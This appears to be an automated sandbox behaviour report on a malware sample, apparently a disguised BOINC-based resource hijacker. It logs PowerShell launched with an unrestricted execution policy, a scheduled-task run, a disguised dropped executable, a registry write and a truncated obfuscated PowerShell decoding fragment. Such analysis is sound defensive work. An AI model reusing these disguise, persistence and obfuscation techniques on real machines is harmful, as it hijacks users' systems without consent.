Source: unknown Process created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: unknown Process created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe Process created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater"
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"Jump to behavior
Source: C:\Program Files\7-Zip\7zG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Source: Google Drive.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 527.zip Static file information: File size 2409320 > 1048576
Source: Binary string: webauthn.pdb source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: wshbth.pdbGCTL source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdbUGP source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdb source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wshbth.pdb source: firefox.exe, 00000003.00000003.1570383225.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NapiNSP.pdb source: firefox.exe, 00000003.00000003.1564490151.000001CA0AECA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.dr
Source: Binary string: netprofm.pdb source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 00000003.00000003.1538788517.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pnrpnsp.pdbUGP source: firefox.exe, 00000003.00000003.1565617150.000001CA0AED5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netprofm.pdbUGP source: firefox.exe, 00000003.00000003.1566110673.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\boinc\boinc\win_build\Build\x64\Release\boinc_exe.pdb source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($nudjq3c8k7x6gr4) $ikqwbe9y521ufg6= $blxt5f9u6djvrap.GetBytes("xn2fp8hcregw") $hsevi6ytd7f4pl5 = $37hbifps61xuja2 $nur53p4bqax1c9l = $(for ($z0ugfp6bl7o9ykc = 0; $z0ugfp6bl7o9y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: gmpopenh264.dll.tmp.3.dr Static PE information: section name: .rodata
Source: boinc.exe.24.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB31993FE push 8B485E31h; iretd 20_2_00007FFEB3199406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB31922E5 push eax; retf 20_2_00007FFEB31922F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB31960F5 push cs; retf 20_2_00007FFEB319610F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB3404747 push ds; retf 20_2_00007FFEB340474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB3530BA0 push ebx; retf 20_2_00007FFEB3530BAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB35308D9 push ebx; ret 20_2_00007FFEB35308DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A61D5 pushad ; ret 20_2_00007FFEB37A61DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A15E8 pushad ; retf 20_2_00007FFEB37A15E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A3D42 push edi; iretd 20_2_00007FFEB37A3D43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A3D9D push edi; iretd 20_2_00007FFEB37A3D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A3CE7 push edi; iretd 20_2_00007FFEB37A3CE8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB37A3E4D push esi; iretd 20_2_00007FFEB37A3E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB39046C8 pushfd ; retf 20_2_00007FFEB39046D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB3AE6D20 push esp; iretd 20_2_00007FFEB3AE6D29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFEB3AE2A75 push edi; iretd 20_2_00007FFEB3AE2A76
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB379722E push esi; retf 35_2_00007FFEB3797237
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB37932CB push esp; iretd 35_2_00007FFEB37932CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB3797510 push ebx; iretd 35_2_00007FFEB379753A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB3792520 push esp; retf 35_2_00007FFEB3792521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB3793131 push ecx; ret 35_2_00007FFEB3793132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB379563E push esi; retf 35_2_00007FFEB379563F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB38F3EE7 push ds; retf 35_2_00007FFEB38F3EEF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB38F7937 push ebx; retf 35_2_00007FFEB38F793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_00007FFEB38F192B push ecx; ret 35_2_00007FFEB38F192C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
